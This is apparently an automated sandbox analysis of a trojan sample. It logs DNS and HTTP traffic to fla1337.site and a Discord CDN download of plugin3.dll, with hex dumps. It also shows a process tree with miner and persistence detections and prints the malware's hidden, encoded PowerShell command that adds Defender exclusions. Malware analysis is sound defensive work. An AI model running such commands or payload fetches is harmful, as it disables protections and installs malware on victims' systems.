                                            Nov 1, 2024 06:25:59.388601065 CET101050267147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:59.388668060 CET502671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.389249086 CET502671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.394685984 CET101050267147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:59.394748926 CET502671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.498811007 CET502681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.503830910 CET101050268147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:59.503923893 CET502681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.568945885 CET502681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.573796988 CET101050268147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:59.573873043 CET502681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:59.578800917 CET101050268147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:26:00.183537006 CET101050268147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:26:00.216963053 CET101050268147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:26:00.217041016 CET502681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:26:00.217801094 CET502681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:26:00.222908020 CET101050268147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:26:00.222974062 CET502681010192.168.2.4147.189.173.36
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 1, 2024 06:22:00.948412895 CET5378353192.168.2.41.1.1.1
                                            Nov 1, 2024 06:22:00.959804058 CET53537831.1.1.1192.168.2.4
                                            Nov 1, 2024 06:22:01.908121109 CET5831253192.168.2.41.1.1.1
                                            Nov 1, 2024 06:22:01.915591955 CET53583121.1.1.1192.168.2.4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 1, 2024 06:22:00.948412895 CET192.168.2.41.1.1.10x7337Standard query (0)fla1337.siteA (IP address)IN (0x0001)false
                                            Nov 1, 2024 06:22:01.908121109 CET192.168.2.41.1.1.10x12ecStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 1, 2024 06:22:00.959804058 CET1.1.1.1192.168.2.40x7337No error (0)fla1337.site147.189.173.36A (IP address)IN (0x0001)false
                                            Nov 1, 2024 06:22:01.915591955 CET1.1.1.1192.168.2.40x12ecNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                            Nov 1, 2024 06:22:01.915591955 CET1.1.1.1192.168.2.40x12ecNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                            Nov 1, 2024 06:22:01.915591955 CET1.1.1.1192.168.2.40x12ecNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                            Nov 1, 2024 06:22:01.915591955 CET1.1.1.1192.168.2.40x12ecNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                            Nov 1, 2024 06:22:01.915591955 CET1.1.1.1192.168.2.40x12ecNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                            • cdn.discordapp.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449732162.159.135.2334437008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-01 05:22:02 UTC224OUTGET /attachments/1301574231573663746/1301575510102507551/plugin3.dll?ex=6724fa27&is=6723a8a7&hm=de75ef4bcda6b9340b0357973edbc8ae95f493136ccb6eede12840c8370e40e0& HTTP/1.1
                                            Host: cdn.discordapp.com
                                            Connection: Keep-Alive
                                            2024-11-01 05:22:02 UTC1181INHTTP/1.1 200 OK
                                            Date: Fri, 01 Nov 2024 05:22:02 GMT
                                            Content-Type: application/x-msdos-program
                                            Content-Length: 2355928
                                            Connection: close
                                            CF-Ray: 8db971dedaef464a-DFW
                                            CF-Cache-Status: HIT
                                            Accept-Ranges: bytes, bytes
                                            Cache-Control: public, max-age=31536000
                                            Content-Disposition: attachment; filename="plugin3.dll"
                                            ETag: "9f5d511a35c11a2e2510b2394fab93ec"
                                            Expires: Sat, 01 Nov 2025 05:22:02 GMT
                                            Last-Modified: Thu, 31 Oct 2024 15:56:23 GMT
                                            Vary: Accept-Encoding
                                            alt-svc: h3=":443"; ma=86400
                                            x-goog-generation: 1730390183842416
                                            x-goog-hash: crc32c=aynGYA==
                                            x-goog-hash: md5=n11RGjXBGi4lELI5T6uT7A==
                                            x-goog-metageneration: 1
                                            x-goog-storage-class: STANDARD
                                            x-goog-stored-content-encoding: identity
                                            x-goog-stored-content-length: 2355928
                                            x-guploader-uploadid: AHmUCY0NaSOumCcIpeywP1AkL14Ymw8JMBRPnYPm8EjIqljD44FQw8YDD3u5YLr-KukgsbLH6Kg
                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                            Set-Cookie: __cf_bm=htAWKje6lo1cqvE6l16QqPTpyVKC3vGHHAtzBTCzCiY-1730438522-1.0.1.1-iAsGUibZMWD1TpI8dspE4AZ.g5UgpgSBA8TkP3vc32bDT4W9WxC8ZHJ0.apIxQNmfEht9cgg6mUQVmI67FvRHQ; path=/; expires=Fri, 01-Nov-24 05:52:02 GMT; domain=.discordapp.com; HttpOnly; Secure
                                            2024-11-01 05:22:02 UTC513INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 7a 53 4c 42 35 4b 76 52 43 68 57 68 46 61 25 32 42 74 58 54 39 48 6f 72 69 59 73 79 50 6b 34 72 74 6b 7a 35 76 31 56 42 62 63 62 4d 50 35 69 77 67 7a 38 4b 49 63 7a 5a 35 4a 35 36 33 6b 43 31 54 50 75 33 59 36 42 41 31 70 31 48 75 4f 62 69 53 31 52 4a 31 65 46 49 49 53 39 52 45 5a 54 6e 67 4d 42 53 41 61 45 67 50 76 73 33 33 49 38 4e 75 78 43 69 44 50 36 73 74 78 34 78 46 6a 56 4f 41 25 32 42 79 4d 33 31 78 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSLB5KvRChWhFa%2BtXT9HoriYsyPk4rtkz5v1VBbcbMP5iwgz8KIczZ5J563kC1TPu3Y6BA1p1HuObiS1RJ1eFIIS9REZTngMBSAaEgPvs33I8NuxCiDP6stx4xFjVOA%2ByM31xw%3D%3D"}],"group":"cf-nel","max_age":60
                                            2024-11-01 05:22:02 UTC1044INData Raw: 21 a6 75 d0 a5 67 0f c9 2e 3e ac de 46 2a 5f 90 e6 99 8f ac cf 44 b2 e8 b0 00 a3 27 d8 4b 2d 7b c4 21 5b 36 d3 80 f3 07 34 9f 06 c8 37 2e 77 a1 23 e6 a5 bd 7d b7 13 ff ab 8a 1f 32 16 b9 87 6b aa 6a 0d e0 19 85 7e 9f 67 31 78 3d c6 96 2f 86 6d a9 48 2e 03 17 ac 0e ea 8f 01 1e 87 a4 fe 4e d0 a6 b0 78 0d 3e 52 e3 47 8a c1 5b d0 ae a3 c4 d8 6c c5 f9 11 3a ff c3 77 50 c6 98 7b 13 e0 b5 60 e7 7d 30 40 a6 2a 7c 9f 4d ed de 4b 7d 9d bb 8a 1d ce 52 1b 5d 29 99 60 2e 75 1f a4 29 22 9e 98 cc b1 53 ff 59 3b b2 37 14 e6 37 d6 11 a7 8d a4 15 7f c5 d2 12 7b 15 ed 95 ca 62 af 0e fb 7d f4 a4 f8 43 8f 06 81 45 51 5c 22 36 0b 45 71 9c 5a a2 bf 92 f0 97 44 9e 3e c0 5e 63 09 4a 56 4f d5 eb 13 62 ca 63 44 60 18 d9 0e d4 8a 9d d3 1e 41 ff 1d 45 83 67 8a a4 94 06 82 1e d4 b8 62
                                            Data Ascii: !ug.>F*_D'K-{![647.w#}2kj~g1x=/mH.Nx>RG[l:wP{`}0@*|MK}R])`.u)"SY;77{b}CEQ\"6EqZD>^cJVObcD`AEgb
                                            2024-11-01 05:22:02 UTC1369INData Raw: 75 61 3b 05 9f cb 52 7c 32 df a1 c2 55 01 90 7e 57 9f 0d c4 6f 82 b7 21 67 10 7d 8f 9f 4e 72 07 fa 7d 9b ac 97 f7 08 5b d4 b5 7f ef 14 24 b5 7f cf 56 2f ff 27 fa 98 d8 a1 04 0f bd cb 49 9d 86 b8 7f f5 0e 36 bb 4f fb 6d 4c 25 c4 07 4e f1 ca 1f 42 fb 9f 13 13 0a e5 dd c1 fd 58 33 46 ae f0 1b 37 54 bb 04 06 92 be 30 8c a3 01 0b e1 50 63 28 69 d8 10 a1 be 5f 43 49 36 b7 3d 29 80 c2 fa c8 3d d3 92 56 04 88 f3 c2 f2 91 32 8c 50 86 f3 f8 81 3d 5b 66 1e 79 de 0c ad 49 e6 fa c7 d3 25 7e 80 36 08 6b 14 cc 76 fe 63 4a 38 1b 82 cc 31 2c da 1d b3 65 b8 52 4f 30 9c 2f 07 1a 0a a2 3f 43 9b 7b 75 bf 4a cf 57 c5 e3 de 28 a3 af 2e 30 68 7c fe a6 78 92 47 91 f9 9f b3 ec 29 aa 93 96 ab db 8c 79 a6 47 6d 1b db b8 a2 88 fe 46 ad bd 2f ba 2e bc 32 d1 a3 b4 84 b2 61 96 6a 49 95
                                            Data Ascii: ua;R|2U~Wo!g}Nr}[$V/'I6OmL%NBX3F7T0Pc(i_CI6=)=V2P=[fyI%~6kvcJ81,eRO0/?C{uJW(.0h|xG)yGmF/.2ajI
                                            2024-11-01 05:22:02 UTC1369INData Raw: f7 70 06 76 5d bd 8d 17 b1 42 9e 1e 27 12 1c f9 e4 9a 6d f6 95 24 f9 ae 60 f0 c3 da 81 4b 07 ea 19 1f b4 27 d6 01 1a 40 9d b9 1f f1 1a 50 e6 83 2c 91 1a e4 28 f9 22 31 36 50 11 04 9f 94 f8 46 c6 24 94 d1 73 54 35 42 29 ad 09 2b 19 5d bc 3a 57 81 19 1f 50 2d f6 86 74 b1 40 da c1 c9 5b 47 f7 15 6b 9b 4a 32 e6 da b7 ff 6a e8 04 a9 f1 1e 29 b2 9f 0c 29 fe e0 d9 ed b6 e5 c2 8c 39 fd 78 20 24 78 4a e7 72 3e 67 d3 7e 51 6e c2 bd 59 25 bd 68 57 02 bb 21 62 da 9e a9 01 2c 22 f9 24 ab f5 f0 88 e4 fe 6f 2c 93 11 5f d6 9d 06 93 c4 5d 25 2a 1f f4 50 32 22 a8 6c c7 b0 51 d4 e3 e3 a7 ad 9f d1 b2 36 ae d7 29 85 bd f5 6b cd 71 7e c4 10 3c bb 42 4f d5 3a 2c ef f0 04 65 d2 35 3a 21 3d 7a 43 8f 95 87 6f 84 84 3f b4 a5 a5 07 b4 38 fb 58 cc dd fa 5c 17 8e 4d 78 6d d2 e6 86 69
                                            Data Ascii: pv]B'm$`K'@P,("16PF$sT5B)+]:WP-t@[GkJ2j))9x $xJr>g~QnY%hW!b,"$o,_]%*P2"lQ6)kq~<BO:,e5:!=zCo?8X\Mxmi
                                            2024-11-01 05:22:02 UTC1369INData Raw: c3 5d d1 e0 32 38 e6 a4 b9 ce e8 1a f8 52 b5 08 05 db f9 8b 3c cd 0d 16 47 56 67 ec 5f b0 50 ab ef c6 43 b7 97 14 e3 38 f8 6b 81 b7 e2 b5 0d 45 65 67 d6 5c eb d0 fc 9d e5 d5 ba 44 da c5 03 45 2d 75 26 c6 d0 f3 2a b8 0a 1c 27 83 39 8f 1f 76 da 26 8d 5e c8 0d e7 41 ce 57 7a a1 83 69 bf a3 22 c3 95 99 b7 55 18 eb 04 51 3e 49 01 10 06 70 14 1d 16 b7 50 e8 b7 49 74 4c 52 da b5 7a a1 94 18 35 50 c2 d7 38 6d e3 8e 61 2e df 16 c0 5d 07 83 63 72 82 b7 dc a6 85 a4 78 a0 70 6c e9 0e a0 5d 38 89 07 7e 47 10 a4 c0 34 aa 5b 6d de 19 7e 5a ad b5 87 88 44 97 ae e3 3e eb 6d 2a 35 c9 6c c8 1e e6 11 c2 d1 7f 3f d4 b7 a4 a2 e9 8e d3 2d ec 25 66 1c 09 a1 49 65 73 f1 9a 7c 43 9c 76 17 54 36 04 7a 52 2f 48 a6 1a d7 f1 dd fa 0d 21 bb e1 0e 6e 1d f1 0f b5 e6 72 da 37 f9 f0 24 78
                                            Data Ascii: ]28R<GVg_PC8kEeg\DE-u&*'9v&^AWzi"UQ>IpPItLRz5P8ma.]crxpl]8~G4[m~ZD>m*5l?-%fIes|CvT6zR/H!nr7$x
                                            2024-11-01 05:22:02 UTC1369INData Raw: 78 d2 c8 9c 6e 1c 99 85 b5 8f e5 44 14 90 13 c2 2a 15 47 d8 70 73 8c e2 19 09 1d 03 1e db b3 95 38 77 3e 11 d7 1b 63 b1 cd 7d a6 7e 1b 52 4e a1 6c 10 93 ef 4c 5f 57 7d db ad a2 85 8b 1c c5 55 04 77 14 68 db 83 4d d6 ac ff 11 fe 15 45 96 e1 0a 15 b8 8e 62 4c 4e fe 63 66 ca 3e 78 51 75 99 61 b5 a3 39 e9 80 a4 c1 8b 35 a5 49 1c 7e d7 82 ed 78 42 3e d9 44 6e 7c 09 b0 bd bf 81 85 31 ff f1 3c 76 dc 05 2a 61 90 b7 4f de e4 52 9e df a2 96 f0 73 c7 7b de 95 66 4a da 19 f0 a3 d9 65 e0 bb d0 2a e1 fc d6 ba 90 d9 93 c4 33 e9 ba e4 1f 9b fe d0 15 b8 97 3b 06 b7 c0 e1 30 a8 07 98 71 4d e8 10 6c a8 5e e2 0f 9a 10 c6 2e 69 d9 9e 42 a9 34 97 fe d8 60 25 79 29 71 32 af c4 04 ae fe 3e 4a 49 f3 29 c5 cf c1 6a b7 f5 e0 24 75 54 3a 85 23 14 75 04 6d 10 73 72 9b f4 2e d3 ee ff
                                            Data Ascii: xnD*Gps8w>c}~RNlL_W}UwhMEbLNcf>xQua95I~xB>Dn|1<v*aORs{fJe*3;0qMl^.iB4`%y)q2>JI)j$uT:#umsr.
                                            2024-11-01 05:22:02 UTC1369INData Raw: 3b 47 88 c5 96 30 c0 c9 5d b0 a3 48 73 08 f4 5f ac e8 98 30 62 72 da fb cf b6 92 f9 99 c7 fa ec dc 6e 8c 97 b8 d3 b4 71 b6 24 af c7 fc c3 90 df 9d cf b9 3b 7f b8 0a aa 80 bb 83 5a 33 a6 06 f8 5e 02 d8 07 68 f4 d2 ba 5c 1b ed 1f 71 e0 ba ee fb 2c 22 5f 10 dc a6 3b 70 c8 64 e4 d1 e6 2f e5 a1 7c 5b f5 eb 62 4c a1 15 90 bf a5 d8 19 34 81 db 9e dd fa 2c 5c 65 43 cb 9a 2c 76 5c 4e 79 76 36 94 fb c8 f4 a9 4c 1f 85 01 1e 80 ac 21 b0 cd d8 52 4e ca bd 30 63 88 23 b0 8e c5 cb 52 3c a0 16 93 45 91 82 33 8a 08 63 76 c1 c7 3d 0f 94 0c de cc f7 97 a7 78 f1 ac 5d d2 22 9a 5e d8 d0 70 94 53 86 8f 39 aa d5 a1 cb 26 df 78 7b da 8f 86 97 04 b2 f6 e6 45 ec de a4 dd dc 80 54 c7 a0 38 3b 69 85 e6 c1 d6 fd 8d 42 4b 74 d7 cd 1c 9d f2 7c 81 f5 60 12 17 38 55 32 26 50 87 a4 e2 e3
                                            Data Ascii: ;G0]Hs_0brnq$;Z3^h\q,"_;pd/|[bL4,\eC,v\Nyv6L!RN0c#R<E3cv=x]"^pS9&x{ET8;iBKt|`8U2&P
                                            2024-11-01 05:22:02 UTC1369INData Raw: 07 c9 bc f3 52 5b 58 73 9e 4f 61 f3 33 48 0b ad 1b 15 a2 13 09 55 7f 9e 48 86 d7 f5 29 45 e7 45 72 81 21 93 dd 86 52 b6 19 7f 4f d8 7b 13 ba ba 78 fb 7f da 50 77 ff 5a 34 46 78 25 6c fd 98 ac 37 95 b0 99 3b 45 a4 9e cf 33 0f 8a 2f ba 7d d3 89 23 fb 95 ad d7 02 aa 0b 5c 8a e3 29 01 60 28 3a 93 7a bf db 61 38 0c 8d 0b 4d 80 30 75 43 e4 c7 c5 d9 48 34 7e bc 3d 33 b0 9a 3a 76 fa 73 ce 1d ab 3f 05 95 15 e4 99 53 f5 83 f1 ea 9b e4 7b e9 95 6b cc ef bd 94 bf c1 a9 a9 27 7b fd ba df 00 1d d0 ef 75 7c b7 a2 3b ee e4 ab 3a 4d 6f 9d 59 63 39 76 e1 00 18 72 b1 6a 31 2a 60 57 1f 91 d6 18 54 b2 f1 c5 dd 13 0e 75 7d b1 a1 ec 4e 4e 89 5f af b4 74 2f c3 a3 bc ac 0b 3d 63 7b dc 6e 04 6f f6 1e b7 1a eb ab d1 f4 65 e3 84 18 71 3c a5 99 ea 30 4b eb 47 f3 96 d7 f4 d9 76 f6 61
                                            Data Ascii: R[XsOa3HUH)EEr!RO{xPwZ4Fx%l7;E3/}#\)`(:za8M0uCH4~=3:vs?S{k'{u|;:MoYc9vrj1*`WTu}NN_t/=c{noeq<0KGva
                                            2024-11-01 05:22:02 UTC1369INData Raw: e3 b8 60 f4 37 2d 13 e7 a6 ff 2e 4b dd 6d 06 9c 5f b5 f8 81 fd 3c 83 d2 ca 1a 42 e2 f9 57 0d f7 81 ae d1 54 73 ea 44 e2 d5 70 69 5b 07 19 ff e3 6b 76 1e 36 a7 7d cc 4c fd cd 31 2d 3b 4f 80 aa a2 4d 2b 83 4c 86 33 74 49 18 27 10 72 c9 b8 a3 6a 8a 6d d0 04 df db 5f ea 72 31 1a 0e 44 15 bf b0 16 88 64 1a 0e bd c6 32 44 98 e0 dc 93 43 57 d8 f5 63 5b 38 78 bf 6e f0 9a 8b 6f 01 ae 8d 4e 7e ff 40 9d b4 15 ea eb 16 77 1d 2c 06 66 0c a7 42 24 2b c9 20 8f f3 e7 0c 34 40 15 0e 09 c9 01 2e 8e fb e5 d5 5d b6 52 4e 91 83 1a a2 ca 5d e0 3d a7 60 41 fe 60 5d cf a0 d8 1e f4 1c 14 09 27 77 36 be a2 d0 2d e1 55 75 a1 08 32 50 bb 7f a6 bb 45 b9 c3 d0 a7 23 fb 01 14 0f f8 7c e3 59 1e ad 38 b7 67 50 99 e8 00 78 55 bc 9f ec 35 cd 72 6a 5c 67 03 9d 7b db 30 7a eb 66 2a 36 7a c9
                                            Data Ascii: `7-.Km_<BWTsDpi[kv6}L1-;OM+L3tI'rjm_r1Dd2DCWc[8xnoN~@w,fB$+ 4@.]RN]=`A`]'w6-Uu2PE#|Y8gPxU5rj\g{0zf*6z
                                            2024-11-01 05:22:02 UTC1369INData Raw: 21 85 25 e4 2a ef 4a d5 7a f9 18 a2 4f 63 60 36 64 1c fa 66 bf 39 1d 6e 52 a9 d3 a8 b9 aa cd 0d be 84 d0 99 a5 00 76 e3 d2 76 01 a0 d5 8e 6a 77 30 8b 10 19 57 93 67 4b 0a c0 67 05 42 85 1e 28 38 9e 66 1a a6 7a 26 1c c0 f5 36 8a b0 a4 1d a1 f7 d9 79 8d 6d c1 87 22 64 53 4c bf 5e ee 38 cc 3b 3a a5 9d 32 07 16 2c 0c bc 19 c3 6c 2f a8 c5 b0 9e 2c 65 eb 86 54 f0 2a a8 57 f1 60 62 f8 70 b5 c5 e4 2d 67 a1 2b d2 15 c2 f3 56 5f a5 bd 2f 2c c4 93 3b 3c 98 7b 9a e1 c1 15 bb 43 62 21 a9 ac b6 78 8b 3c ae 01 66 87 9a 94 38 20 c1 90 02 bb 22 d7 74 7f 92 96 2a 7c 19 da d8 8b cc cb ec e8 b4 83 71 f4 7b 6f 82 e4 29 75 80 23 ab 5d ea f9 65 21 f9 ab ea be 60 5b 2b 85 fa e9 7f b4 d4 20 44 b2 e2 48 bb 58 c0 7a 64 8d a3 77 b2 51 fb 84 46 6d 70 63 85 22 81 e8 10 16 05 66 8f 78
                                            Data Ascii: !%*JzOc`6df9nRvvjw0WgKgB(8fz&6ym"dSL^8;:2,l/,eT*W`bp-g+V_/,;<{Cb!x<f8 "t*|q{o)u#]e!`[+ DHXzdwQFmpc"fx


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:01:21:52
                                            Start date:01/11/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe"
                                            Imagebase:0x1fc70030000
                                            File size:732'160 bytes
                                            MD5 hash:11B29218685A3C58CAB85C9D39D52DCE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1675197443.000001FC00346000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1675197443.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1681390450.000001FC70500000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1677637412.000001FC10536000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:01:21:55
                                            Start date:01/11/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:01:21:55
                                            Start date:01/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:01:21:55
                                            Start date:01/11/2024
                                            Path:C:\Users\user\AppData\Roaming\XsdType\Target.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Roaming\XsdType\Target.exe
                                            Imagebase:0x1b0b87e0000
                                            File size:732'160 bytes
                                            MD5 hash:11B29218685A3C58CAB85C9D39D52DCE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1723437634.000001B0CAC76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1723437634.000001B0CABD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1710027843.000001B0BA6A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 45%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:4
                                            Start time:01:21:58
                                            Start date:01/11/2024
                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                            Imagebase:0x1dc421e0000
                                            File size:65'168 bytes
                                            MD5 hash:A4EB36BAE72C5CB7392F2B85609D4A7E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.4112743576.000001DC42495000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.4115219254.000001DC43E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:5
                                            Start time:01:22:00
                                            Start date:01/11/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff693ab0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:01:22:20
                                            Start date:01/11/2024
                                            Path:C:\Users\user\AppData\Roaming\XsdType\Target.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Roaming\XsdType\Target.exe
                                            Imagebase:0x1f50c1a0000
                                            File size:732'160 bytes
                                            MD5 hash:11B29218685A3C58CAB85C9D39D52DCE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2236493693.000001F51E536000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2236493693.000001F51E5D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2236493693.000001F51E306000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
